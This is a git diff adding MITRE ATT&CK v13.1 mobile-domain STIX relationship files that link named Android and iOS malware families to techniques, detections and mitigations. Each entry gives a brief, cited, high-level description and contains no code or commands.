@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--48d233c6-99a2-4e33-a238-c8eb4a9fdfd2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0727ac06-5b46-4f79-abe9-63c1b923d383", + "created": "2023-02-06T19:05:56.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:11.541Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has included encoded shell scripts to potentially aid in the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--078653a6-3613-4923-ae5a-1bccb8552e67.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--078653a6-3613-4923-ae5a-1bccb8552e67.json new file mode 100644 index 0000000000000000000000000000000000000000..bb560afdd42604b0023d4a26c52844695c0d1485 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--078653a6-3613-4923-ae5a-1bccb8552e67.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--5dc712c4-0005-4af2-83a0-26d64e4c1c31", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--078653a6-3613-4923-ae5a-1bccb8552e67", + "type": "relationship", + "created": "2020-09-11T16:22:03.250Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.250Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) has been installed in two stages and can secretly install new applications.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61.json new file mode 100644 index 0000000000000000000000000000000000000000..9071c4f7eced2764051d1e780d98ac29954230fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--45d05a23-5a1d-46a8-bb26-054e638aeae8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) monitors for iOS devices connected via USB to an infected OSX computer and installs downloaded third-party applications or automatically generated malicious applications onto the device.(Citation: PaloAlto-WireLurker)", + "relationship_type": "uses", + "source_ref": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07dd3318-2965-4085-be64-a8e956c7b8da.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07dd3318-2965-4085-be64-a8e956c7b8da.json new file mode 100644 index 0000000000000000000000000000000000000000..7142b788c5c85bed12bbfe69f1db285701fece2e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07dd3318-2965-4085-be64-a8e956c7b8da.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--372a39cc-587a-4cb2-8613-9725a4cc797b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07dd3318-2965-4085-be64-a8e956c7b8da", + "type": "relationship", + "created": "2020-12-18T20:14:47.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.319Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has stored encoded strings.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e.json new file mode 100644 index 0000000000000000000000000000000000000000..f36bd6f9aa02d61af067c36cf195fa31482115f5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--42a4d5cf-8ff6-4b50-91bb-4bacd86494e7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e", + "created": "2022-03-30T18:15:03.625Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T18:15:03.625Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f.json new file mode 100644 index 0000000000000000000000000000000000000000..79078a1e3e685703057b4f41fad4ec2f4b4b2c3f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--7148eebf-96eb-4a77-950e-914ef64b4e17", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f", + "created": "2023-03-20T15:55:32.395Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:55:32.395Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--084786ee-9384-4a00-9e1b-48f94ea70126.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--084786ee-9384-4a00-9e1b-48f94ea70126.json new file mode 100644 index 0000000000000000000000000000000000000000..28d39593cd1259f3b360b30dc1850c55621fdc7a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--084786ee-9384-4a00-9e1b-48f94ea70126.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--47c2a313-3c65-41c1-bce9-7bf5e0245a53", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--084786ee-9384-4a00-9e1b-48f94ea70126", + "created": "2019-09-03T19:45:48.517Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:09:45.426Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can exfiltrate calendar events.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--085f8397-0233-42d7-855e-3dbd709f2eca.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--085f8397-0233-42d7-855e-3dbd709f2eca.json new file mode 100644 index 0000000000000000000000000000000000000000..31a25e655d5d8f2aa922e831ffde6d5ddfbd8393 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--085f8397-0233-42d7-855e-3dbd709f2eca.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--40789f29-434e-4bcf-9ad8-2ab627163460", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--085f8397-0233-42d7-855e-3dbd709f2eca", + "created": "2023-01-18T21:39:27.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a \u201cnew\u201d generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:30:43.093Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use the Android \u201cDirect Reply\u201d feature to spread the malware to other devices. It can also download the full version of the malware after initial device compromise.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f.json new file mode 100644 index 0000000000000000000000000000000000000000..938acd47e695b847fe6cd01695df64a1e04b0901 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--94904af2-f2eb-4ebc-bb26-185662aed1a9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f", + "created": "2023-03-20T18:58:33.787Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:33.787Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8.json new file mode 100644 index 0000000000000000000000000000000000000000..d99a88bc71cbe54a63c5615f566065bdd49c1b03 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--4cf8e721-11ec-4476-973d-f5982c641d5f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8", + "created": "2022-04-01T15:16:02.324Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "iOS Universal Links", + "url": "https://developer.apple.com/ios/universal-links/", + "description": "Apple. (n.d.). Universal Links for Developers. Retrieved September 11, 2020." + }, + { + "source_name": "Android App Links", + "url": "https://developer.android.com/training/app-links/verify-site-associations", + "description": "Google. (n.d.). Verify Android App Links. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Developers should use Android App Links(Citation: Android App Links) and iOS Universal Links(Citation: iOS Universal Links) to provide a secure binding between URIs and applications, preventing malicious applications from intercepting redirections. Additionally, for OAuth use cases, PKCE(Citation: IETF-PKCE) should be used to prevent use of stolen authorization codes. 
", + "modified": "2022-04-01T15:16:02.324Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08a43019-d393-451f-a23c-2dfa17ec40b2.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08a43019-d393-451f-a23c-2dfa17ec40b2.json new file mode 100644 index 0000000000000000000000000000000000000000..38ba9899d2cac562801dc9285526511a7b82d7db --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08a43019-d393-451f-a23c-2dfa17ec40b2.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--f089ba5f-31af-42bc-9085-c4368a4a8df2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--08a43019-d393-451f-a23c-2dfa17ec40b2", + "created": "2023-01-18T19:15:24.775Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:51:07.963Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can steal incoming SMS messages and send SMS messages from compromised devices. (Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08c81253-975c-4780-8e85-c72bc6a90c88.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08c81253-975c-4780-8e85-c72bc6a90c88.json new file mode 100644 index 0000000000000000000000000000000000000000..c0e8f6bc2c40165ac786e1f5fba9a36eb56fb782 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08c81253-975c-4780-8e85-c72bc6a90c88.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--627c25e1-2097-465e-bf5b-140eb87ff4c4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08c81253-975c-4780-8e85-c72bc6a90c88", + "created": "2020-10-29T19:21:23.225Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can generate revenue by automatically displaying ads.(Citation: WeLiveSecurity AdDisplayAshas)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956.json new file mode 100644 index 0000000000000000000000000000000000000000..2d3b445a689337ecdd32f2fb62730aadc97130db --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1ef208d0-2ddd-42d8-9ea0-f313f3272e52", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956", + "created": "2020-11-24T17:55:12.873Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:56.899Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has communicated with the C2 using HTTP requests or WebSockets as a backup.(Citation: Talos GPlayed) ", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0993769f-63fb-4720-bbcf-e6f37f71515e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0993769f-63fb-4720-bbcf-e6f37f71515e.json new file mode 100644 index 0000000000000000000000000000000000000000..950c158a0c6bc2a1f6840fb2a9acc1fa07fbeb93 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0993769f-63fb-4720-bbcf-e6f37f71515e.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b2103a07-4a8a-4b15-9de4-8df32c9cba03", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0993769f-63fb-4720-bbcf-e6f37f71515e", + "type": "relationship", + "created": "2020-06-02T14:32:31.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.875Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device\u2019s name, serial number, iOS version, total disk space, and free disk space.(Citation: Google Project Zero Insomnia) ", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca.json new file mode 100644 index 0000000000000000000000000000000000000000..c688d848083d3c180ccdddafaca79aae8a040422 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--af2b0e75-97ff-423c-8a2b-42a38e6bf492", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca", + "created": "2022-04-06T13:22:57.754Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:22:57.754Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "target_ref": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c6bbd4-9058-4657-9d8e-656439637ac6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c6bbd4-9058-4657-9d8e-656439637ac6.json new file mode 100644 index 0000000000000000000000000000000000000000..3a7283806d08be4091f3a33fb862b7ad7b9a270b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c6bbd4-9058-4657-9d8e-656439637ac6.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--68170f1a-5445-441b-839f-bb42baf161b6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--09c6bbd4-9058-4657-9d8e-656439637ac6", + "created": "2023-03-16T18:32:47.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:32:47.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d.json new file mode 100644 index 0000000000000000000000000000000000000000..0958acd182eaaa332c7c28a78ffb38fed95f9083 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--3a4cbbf6-addd-47a0-a686-2f6821184a92", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d", + "created": "2023-02-06T19:01:08.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:32.636Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has encoded files, such as exploit binaries, to potentially use during and after the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012.json 